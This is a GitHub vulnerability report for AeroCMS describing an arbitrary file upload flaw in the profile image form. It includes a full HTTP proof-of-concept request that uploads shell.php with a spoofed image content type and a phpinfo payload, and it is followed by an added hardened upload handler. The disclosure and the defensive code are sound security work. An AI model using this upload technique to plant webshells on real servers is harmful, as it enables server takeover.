MegaTKC / AeroCMS

Aero is a simple and easy to use CMS (Content Management System) designed to create fast and powerful web applications!
GNU General Public License v2.0

An arbitrary file upload vulnerability was found #3

Open Zoe0427 opened 2 years ago

Zoe0427 commented 2 years ago

Hello, I want to report an arbitrary file upload vulnerability that I found in AeroCMS v0.0.1, through which we can upload a webshell and control the web server.

Steps to Reproduce

After entering the background of website management, click "Profile" to enter the interface of "/admin/profile.php", and you can see that the function of uploading pictures exists.

We create a new webshell file and name it shell.php:

<?php phpinfo(); ?>

Next, we select the file and click "Update Profile" to upload the file.

When the upload succeeds, access '/images/shell.php'.


We can see that the file was successfully uploaded and executed.

Vulnerable Code

upfile

No file checking before uploading

POC

Injection Point

-----------------------------423983190532431556521178267050
Content-Disposition: form-data; name="user_image"; filename="shell.php"
Content-Type: image/jpeg

Request

POST /admin/profile.php HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------423983190532431556521178267050
Content-Length: 1109
Origin: http://127.0.0.1:8080
Connection: close
Referer: http://127.0.0.1:8080/admin/profile.php
Cookie: PHPSESSID=dh3hq98sqsj0eapgn43efegfb3
Upgrade-Insecure-Requests: 1

-----------------------------423983190532431556521178267050
Content-Disposition: form-data; name="username"

1111
-----------------------------423983190532431556521178267050
Content-Disposition: form-data; name="password"

123.com
-----------------------------423983190532431556521178267050
Content-Disposition: form-data; name="user_firstname"

-----------------------------423983190532431556521178267050
Content-Disposition: form-data; name="user_lastname"

-----------------------------423983190532431556521178267050
Content-Disposition: form-data; name="user_email"

-----------------------------423983190532431556521178267050
Content-Disposition: form-data; name="user_image"; filename="shell.php"
Content-Type: image/jpeg

test is test

<?php phpinfo();?>
-----------------------------423983190532431556521178267050
Content-Disposition: form-data; name="user_role"

Subscriber
-----------------------------423983190532431556521178267050
Content-Disposition: form-data; name="update_user"

Update Profile
-----------------------------423983190532431556521178267050--

Response

HTTP/1.1 200 OK
Date: Wed, 10 Aug 2022 02:45:01 GMT
Server: Apache/2.4.10 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 8474
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>

AeroCMS Admin Panel

Welcome to the Admin Panel, !

I hope you can fix this vulnerability as soon as possible. I will report this vulnerability to CVE. Looking forward to your reply.
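An added example, not AeroCMS code and not from the reporter, of the file checking the report says is missing from the profile upload handler. It keeps the field name user_image and the images directory from the PoC above; the function name, size limit and allowlist are assumptions.

```php
<?php
// Added example (not AeroCMS code): a hardened replacement for the profile
// image upload step. $file is one $_FILES entry, e.g. $_FILES['user_image'].
function store_profile_image(array $file, string $uploadDir): string
{
    // 1. Only accept a file PHP itself received through this HTTP POST.
    if (!isset($file['tmp_name'], $file['error']) || $file['error'] !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('no valid upload');
    }
    // 2. Size cap (assumed: 2 MiB) before any content inspection.
    if ($file['size'] > 2 * 1024 * 1024) {
        throw new RuntimeException('file too large');
    }
    // 3. Do NOT trust $file['type']: it is the client-supplied Content-Type of
    //    the multipart part, which the PoC sets to image/jpeg for shell.php.
    //    Sniff the actual bytes instead.
    $finfo   = new finfo(FILEINFO_MIME_TYPE);
    $mime    = $finfo->file($file['tmp_name']);
    $allowed = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];
    if ($mime === false || !isset($allowed[$mime])) {
        throw new RuntimeException('not an allowed image type: ' . var_export($mime, true));
    }
    // 4. Require a decodable image; rejects text that merely starts with image magic.
    if (getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('image failed to decode');
    }
    // 5. Never reuse the client filename ("shell.php"). Use a random name and
    //    force the extension from the sniffed type, so nothing ending in .php
    //    is ever written under the web root.
    $name = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    $dest = rtrim($uploadDir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0644); // not executable, not writable by the web server's group
    return $name;
}

// Usage in the profile handler (directory path assumed):
// $stored = store_profile_image($_FILES['user_image'], __DIR__ . '/../images');
```

Pair this with a web-server rule that disables script execution under /images, so that even an image with script text embedded in its metadata is only ever served as a static file.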